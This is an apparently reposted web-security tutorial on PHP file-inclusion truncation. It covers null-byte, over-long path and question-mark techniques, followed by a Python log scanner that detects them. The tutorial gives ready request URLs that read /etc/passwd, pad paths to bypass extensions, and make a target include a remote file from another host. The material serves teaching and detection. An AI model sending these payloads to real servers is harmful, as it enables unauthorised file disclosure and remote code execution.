[Original] Web Security, Chapter 5: Vulnerability Study and Exploitation, 06: File Inclusion Truncation
1. Null-byte (00) truncation
Null-character truncation (PHP < 5.3.4)
(requires magic_quotes_gpc=off)
/etc/passwd
/etc/passwd%00
http://include.moonteam.com/file02.php?file=x.jpg%00

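2. Over-long filename truncation
(Works on PHP versions below 5.2.8; on Linux the file name must be longer than 4096, on Windows longer than 256)
This relies on the operating system's limit on the maximum directory length:
256 bytes on Windows
4096 bytes on Linux
The characters used for truncation are: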
.
http://include.moonteam.com/file02.php?file=x.jpg………………………………………………………………………………………………………………………………………………………………………………………………………………

/.
http://include.moonteam.com/file02.php?file=x.jpg%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e

3. Question-mark truncation
Applies to truncation when the included file is remote.
php>=5.3
allow_url_fopen On On
allow_url_include On
http://www.webtester.com/include/file02.php?file=http://192.168.0.121/x.txt?
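
A defender-side check for the three truncation patterns above, as an added example that is not part of the original article: it scans access-log request lines for a null byte, a long run of `.` or `/.` padding, or a remote URL ending in `?` in any query value. The log lines, the `MIN_PAD_RUN` threshold and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

MIN_PAD_RUN = 32  # assumed threshold: repeated "." or "/." units counted as padding
PAD_RE = re.compile(r"(?:\.{%d,}|(?:/\.){%d,})$" % (MIN_PAD_RUN, MIN_PAD_RUN))
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return sorted indicator names found in the query values of a request target."""
    hits = set()
    for pair in urlsplit(target).query.split("&"):
        value = unquote(pair.partition("=")[2])  # decode %00, %2f%2e, ...
        if "\x00" in value:
            hits.add("null_byte")                # section 1
        if PAD_RE.search(value):
            hits.add("path_padding")             # section 2
        if REMOTE_RE.match(value):               # section 3
            hits.add("remote_url_trailing_qmark" if value.endswith("?") else "remote_url")
    return sorted(hits)

def scan(log_lines):
    """Return (line_number, indicators) for each access-log line that matches."""
    results = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        hits = classify(match.group(1)) if match else []
        if hits:
            results.append((number, hits))
    return results

# Constructed sample lines (combined log format, documentation client address).
PREFIX = '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET '
SUFFIX = ' HTTP/1.1" 200 512'
SAMPLE_LOG = [
    PREFIX + "/file02.php?file=x.jpg" + SUFFIX,
    PREFIX + "/file02.php?file=x.jpg%00" + SUFFIX,
    PREFIX + "/file02.php?file=x.jpg" + "%2f%2e" * 40 + SUFFIX,
    PREFIX + "/include/file02.php?file=http://192.168.0.121/x.txt?" + SUFFIX,
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```
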

Original article by mOon. If you repost it, please credit the source: https://www.moonsec.com/262.html